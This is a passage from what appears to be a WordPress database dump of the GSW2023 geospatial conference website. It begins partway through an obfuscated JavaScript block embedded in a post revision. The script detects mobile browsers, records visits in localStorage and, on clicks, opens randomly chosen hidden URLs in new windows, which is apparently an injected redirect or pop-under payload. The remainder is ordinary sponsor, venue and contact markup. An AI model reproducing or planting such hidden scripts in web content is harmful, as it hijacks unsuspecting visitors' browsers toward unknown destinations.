i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-09-04 13:33:38','2023-09-04 13:33:38','',3066,'https://gsw2023.com/?p=5457',0,'revision','',0),
(5458,1,'2023-09-04 13:35:50','2023-09-04 13:35:50','<p><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span>[vc_row css=\".vc_custom_1692141164274{margin-top: -50px !important;}\"][vc_column width=\"1/2\"][vc_column_text css=\".vc_custom_1692155651924{margin-top: 75px !important;margin-right: -85px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Under the Auspices of </strong></span><br />\r\n<span style=\"font-size: 24pt;\"><strong>H.E. Professor Mostafa Madbouly,</strong></span><br />\r\n<span style=\"font-size: 24pt;\"><strong>Prime Minister of the </strong><strong>Arab Republic of Egypt</strong></span></h4>\r\n<p>[/vc_column_text][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"5267\" img_size=\"250x250\" alignment=\"center\" style=\"vc_box_rounded\" css=\".vc_custom_1692155587524{margin-left: -50px !important;}\"][/vc_column][/vc_row]<span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_end\">﻿</span>[vc_separator style=\"shadow\" border_width=\"10\"]<p><a href=\"https://gsw2023.com/wp-content/uploads/2023/09/The Best.pdf\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4719\" src=\"https://gsw2023.com/wp-content/uploads/2023/09/best.png\" alt=\"\" width=\"487\" height=\"180\" /></a><h4 style=\"text-align: center;\">ISPRS GSW2023 Best Workshop Paper Award</h4></p>\r\n[vc_separator style=\"shadow\" border_width=\"10\"][vc_row][vc_column][vc_column_text]</p>\r\n<h4 style=\"text-align: center;\"><strong><span style=\"font-size: 24pt;\">Prime Sponsors</span></strong></h4>\r\n<p>[/vc_column_text][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141338959{margin-top: 0px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"></h4>\r\n<p>&nbsp;</p>\r\n<p>&nbsp;</p>\r\n<p><a href=\"https://www.gasgi.gov.sa\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4592\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/شعار-الهيئة-العامة-للمساحه-والمعلومات-الجيومكانية-بالمملكة-العربية-السعودية-2-300x110.jpg\" alt=\"\" width=\"447\" height=\"164\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141365647{margin-top: 35px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"></h4>\r\n<p>&nbsp;</p>\r\n<p><a href=\"https://www.tra.gov.eg/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5009 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/ntra-300x116.jpg\" alt=\"\" width=\"300\" height=\"116\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141399321{margin-top: 45px !important;}\"]<a href=\"https://www.mbrsc.ae/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5093 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/MBRSC-LOGO_1-01-300x149.png\" alt=\"\" width=\"300\" height=\"149\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141414655{margin-top: 0px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"></h4>\r\n<p>&nbsp;</p>\r\n<p>&nbsp;</p>\r\n<p><a href=\"https://www.esri.com/en-us/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4719\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/ESRI-300x111.jpg\" alt=\"\" width=\"487\" height=\"180\" /></a></p>\r\n<p>&nbsp;</p>\r\n<p style=\"text-align: left;\">[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][/vc_column_inner][vc_column_inner width=\"1/2\"][/vc_column_inner][vc_column_inner][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1692141209167{margin-top: -70px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_column_text]</p>\r\n<h6 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Platinum Sponsors</strong></span></h6>\r\n<p>[/vc_column_text][vc_row_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1692144968858{margin-top: 20px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"></h4>\r\n<p><a href=\"https://www.pix4d.com/ \" target=\"_blank\" rel=\"noopener\"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1692144942219{margin-top: -100px !important;}\"][vc_row][vc_column][vc_column_text]</p>\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffffff;\"><strong>Platinum Sponsors</strong></span></h4>\r\n<p><a href=\"https://abuqir.net/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5005\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/aboquir-239x300.png\" alt=\"\" width=\"193\" height=\"242\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1692141209167{margin-top: -70px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text]</p>\r\n<p style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #000000;\"><strong>Gold </strong></span><span style=\"color: #000000;\"><strong> Sponsors</strong></span></span></p>\r\n<p>[/vc_column_text][vc_row_inner css=\".vc_custom_1692145343386{margin-top: -130px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096091997{margin-top: 125px !important;}\"]</p>\r\n<h6><a href=\"https://www.bdstar.com/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\r\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1692145428379{margin-top: 60px !important;}\"]</p>\r\n<h3 style=\"text-align: center;\"></h3>\r\n<p>&nbsp;</p>\r\n<p><span style=\"font-size: 8pt;\"><a href=\"https://hdmap.geomatics.ncku.edu.tw/index-US.php\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095942758{margin-top: 137px !important;}\"]<a href=\"https://www.applanix.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219836213{margin-top: -px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4701 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/hexagon_new-300x122.jpg\" alt=\"\" width=\"349\" height=\"142\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951584642{margin-top: 45px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][vc_column_text css=\".vc_custom_1688951717998{margin-top: 90px !important;}\"]<a href=\"https://www.agisoft.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4987 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image-300x102.png\" alt=\"\" width=\"300\" height=\"102\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095881067{margin-top: 20px !important;}\"]<a href=\"https://www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text]</p>\r\n<h5 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Silver Sponsors</strong></span></h5>\r\n<p>[/vc_column_text][vc_row_inner css=\".vc_custom_1692145725824{margin-top: -90px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690459872519{margin-top: 50px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"></h4>\r\n<p>&nbsp;</p>\r\n<p style=\"text-align: center;\"><a href=\"https://www.piesat.cn/en-us/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5053\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/5X5cm-PIESAT-Logo-300x300.png\" alt=\"\" width=\"276\" height=\"276\" /></a></p>\r\n<p>&nbsp;</p>\r\n<p>&nbsp;</p>\r\n<p style=\"text-align: center;\"><a href=\"https://geomatex.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5053\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/32596kmnqz.png\" alt=\"\" width=\"276\" height=\"276\" /></a></p>\r\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1692145657186{margin-top: 50px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"></h4>\r\n<p>&nbsp;</p>\r\n<p>&nbsp;</p>\r\n<p style=\"text-align: center;\"><a href=\"https://www.vexcel-imaging.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4990 \" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image002.jpg\" alt=\"\" width=\"179\" height=\"213\" /></a></p>\r\n<p style=\"text-align: center;\"><a href=\"https://abe.com.eg/\" target=\"_blank\" rel=\"noopener\"><img class=\"wp-image-5339 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/V-ABE-Logo-5.jpg\" alt=\"\" width=\"246\" height=\"185\" /></p><p style=\"text-align: center;\"><a href=\"https://www.esa.gov.eg/\" target=\"_blank\" rel=\"noopener\"><img class=\"wp-image-5339 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/survey.jpg\" alt=\"\" width=\"246\" height=\"185\" /></p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951105389{margin-top: 50px !important;}\"]&nbsp;</p>\r\n<h4 style=\"text-align: center;\"></h4>\r\n<p>&nbsp;</p>\r\n<p>&nbsp;</p>\r\n<p>&nbsp;</p>\r\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4655 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/Terrasolid_logo_wide2_rgb_300dpi-300x112.png\" alt=\"\" width=\"324\" height=\"121\" /><br />\r\n<p style=\"text-align: center;\"><a href=\"https://gsw2023.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4655 \" src=\"https://gsw2023.com/wp-content/uploads/2023/08/mgeo.jpg\" alt=\"\" width=\"324\" height=\"121\" /><br />\r\n[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text]</p>\r\n<h5 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Bronze Sponsors</strong></span></h5>\r\n<p>[/vc_column_text][vc_row_inner css=\".vc_custom_1692145894928{margin-top: -60px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096291206{margin-top: 50px !important;}\"]<a href=\"https://www.geosat.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1692145841186{margin-top: 50px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"></h4>\r\n<p>&nbsp;</p>\r\n<p><a href=\"https://www.riegl.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096532104{margin-top: 88px !important;}\"]<a href=\"https://www.robotlab.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690251276274{margin-top: 50px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\r\n<p><a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-e1690251327743-300x167.png\" alt=\"\" width=\"309\" height=\"172\" /></a></p>\r\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants.</p>\r\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690452445334{margin-top: 50px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Tourism partner</span></h4>\r\n<h4 style=\"text-align: center;\"><a href=\"https://funtrip-travel.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5041\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/LOGO-FINAL2-300x184.jpg\" alt=\"\" width=\"265\" height=\"163\" /></a></h4>\r\n<p style=\"text-align: center;\">Email : <span style=\"color: #3366ff;\"><strong>gsw2023@funtrip-travel.com</strong></span></p>\r\n<p style=\"text-align: center;\">Mobile no and WhatsApp: <span style=\"color: #3366ff;\"><strong>+201221541515</strong></span></p>\r\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Ffuntrip-travel.com%2F|title:FunTrip|target:_blank\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690452582489{margin-top: -15px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For FunTrip More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690600884765{margin-top: 50px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Exhibition organizer</span></h4>\r\n<h4 style=\"text-align: center;\"><a href=\"https://www.purespot.org/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5061\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/Logo-Pure-2-300x300.jpg\" alt=\"\" width=\"151\" height=\"151\" /></a></h4>\r\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt; color: #3366ff;\"><strong>project manager </strong></span><br />\r\n<span style=\"font-size: 8pt;\"><strong>Mr. Omar Mohamed</strong></span><br />\r\n<span style=\"font-size: 8pt;\">Email: omar.mohamed@egypure.org   </span><span style=\"font-size: 8pt;\"> phone : ⁦+20 100 098 8976⁩</span></p>\r\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt;\"><strong>Mr. Ahmed Refaat</strong></span><br />\r\n<span style=\"font-size: 8pt;\">Email: ahmed.refaat@egypure.org   </span><span style=\"font-size: 8pt;\">  phone :⁦+20 100 084 4792</span>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text css=\".vc_custom_1691508515384{margin-top: 50px !important;}\"]</p>\r\n<h1 style=\"text-align: center;\">Journals partner</h1>\r\n<h3 style=\"text-align: center;\">The author has the opportunity to publish his/her articles in one of the following journals :</h3>\r\n<p>&nbsp;</p>\r\n<p style=\"text-align: center;\"><span style=\"color: #000000;\"><a style=\"color: #000000;\" href=\"https://www.springer.com/journal/43995/\"><span style=\"font-size: 14pt;\"><strong>Journal of Umm Al-Qura University for Engineering and Architecture</strong></span></a></span></p>\r\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt;\"><strong><a href=\"http://www.springer.com/journal/43995\">www.springer.com/journal/43995</a></strong></span></p>\r\n<h3></h3>\r\n<p>&nbsp;</p>\r\n<p>&nbsp;</p>\r\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt; color: #000000;\"><strong>Journal of Engineering and Thermal Sciences (JETS) ISSN (Online) 2669-2465</strong></span></p>\r\n<p style=\"text-align: center;\"><strong><span style=\"font-size: 14pt;\"><a href=\"http://www.extrica.com/journal/jets\">www.extrica.com/journal/jets</a></span></strong></p>\r\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text css=\".vc_custom_1687848604610{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 10px !important;}\"]</p>\r\n<h2 style=\"color: #311b92; text-align: center;\"><strong> EGYPT GSW\'2023</strong></h2>\r\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row content_placement=\"top\" css=\".vc_custom_1687710509489{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/3\" css=\".vc_custom_1687711699560{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1687711558584{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\r\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo Semiramis Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity. <a href=\"https://gsw2023.com/index.php/welcome/\"><span style=\"text-decoration: underline;\"><strong><span style=\"color: #3366ff; text-decoration: underline;\">Read More</span></strong></span></a></p>\r\n<p>[/vc_column_text][/vc_column][vc_column width=\"2/3\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][dt_team_masonry order=\"asc\" custom_content_bg_color=\"#e8e8e8\" image_sizing=\"proportional\" img_max_width=\"120px\" image_paddings=\"10px 0px 0px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" team_position_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"105\" css_dt_team_masonry=\".vc_custom_1687711659617{margin-top: 0px !important;}\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3283|url^https://gsw2023.com/wp-content/uploads/2022/11/1664433062169.jpg|caption^null|alt^null|title^1664433062169|description^null\" animation_direction=\"top-animation\" bg_override=\"ex-full\" fadeout_row=\"fadeout_row_value\" enable_overlay=\"enable_overlay_value\" overlay_color=\"#3a3a3a\" overlay_pattern=\"transperant\" overlay_pattern_opacity=\"75\"][vc_column width=\"1/3\"][vc_column_text css=\".vc_custom_1687564704480{margin-top: -4px !important;margin-left: -50px !important;border-left-width: -50px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 14pt;\">InterContinental Cairo Semiramis</span></h4>\r\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\"><img class=\" wp-image-3289 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2022/11/282192719-300x169.jpg\" alt=\"\" width=\"298\" height=\"168\" /></span></h4>\r\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Conference Venue </span></h4>\r\n<p>&nbsp;</p>\r\n<h4 style=\"text-align: 